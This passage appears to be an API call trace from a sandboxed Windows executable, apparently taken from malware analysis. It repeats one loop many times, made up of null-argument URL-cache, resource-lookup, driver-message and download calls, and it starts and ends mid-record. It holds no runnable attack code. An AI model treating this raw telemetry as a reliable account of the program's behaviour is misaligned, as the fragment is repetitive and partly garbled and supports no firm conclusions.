lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.678] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.678] GetUserDefaultLangID () returned 0x409 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.678] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.678] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.678] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.678] GetUserDefaultLangID () returned 0x409 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.678] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.678] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.678] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.678] GetUserDefaultLangID () returned 0x409 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.678] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.678] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.678] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.678] GetUserDefaultLangID () returned 0x409 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.678] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.678] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.678] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.678] GetUserDefaultLangID () returned 0x409 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.678] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.678] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.679] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.679] GetUserDefaultLangID () returned 0x409 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.679] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.679] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.679] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.679] GetUserDefaultLangID () returned 0x409 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.679] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.679] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.679] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.679] GetUserDefaultLangID () returned 0x409 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.679] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.679] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.679] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.679] GetUserDefaultLangID () returned 0x409 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.679] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.679] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.679] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.679] GetUserDefaultLangID () returned 0x409 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.679] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.679] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.679] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.679] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.679] GetUserDefaultLangID () returned 0x409 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.679] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.679] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.680] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.680] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.680] GetUserDefaultLangID () returned 0x409 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.680] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.680] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.680] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.680] GetUserDefaultLangID () returned 0x409 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.680] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.680] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.680] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.680] GetUserDefaultLangID () returned 0x409 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.680] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.680] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.680] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.680] GetUserDefaultLangID () returned 0x409 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.680] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.680] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.680] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.680] GetUserDefaultLangID () returned 0x409 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.680] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.680] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.680] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.680] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.680] GetUserDefaultLangID () returned 0x409 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.680] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.681] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.681] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.681] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.681] GetUserDefaultLangID () returned 0x409 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.681] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.681] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.681] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.681] GetUserDefaultLangID () returned 0x409 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.681] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.681] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.681] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.681] GetUserDefaultLangID () returned 0x409 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.681] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.681] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.681] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.681] GetUserDefaultLangID () returned 0x409 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.681] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.681] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.681] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.681] GetUserDefaultLangID () returned 0x409 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.681] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.681] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.681] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.681] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.681] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.681] GetUserDefaultLangID () returned 0x409 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.682] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.682] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.682] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.682] GetUserDefaultLangID () returned 0x409 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.682] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.682] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.682] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.682] GetUserDefaultLangID () returned 0x409 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.682] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.682] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.682] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.682] GetUserDefaultLangID () returned 0x409 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.682] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.682] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.682] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.682] GetUserDefaultLangID () returned 0x409 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.682] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.682] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, 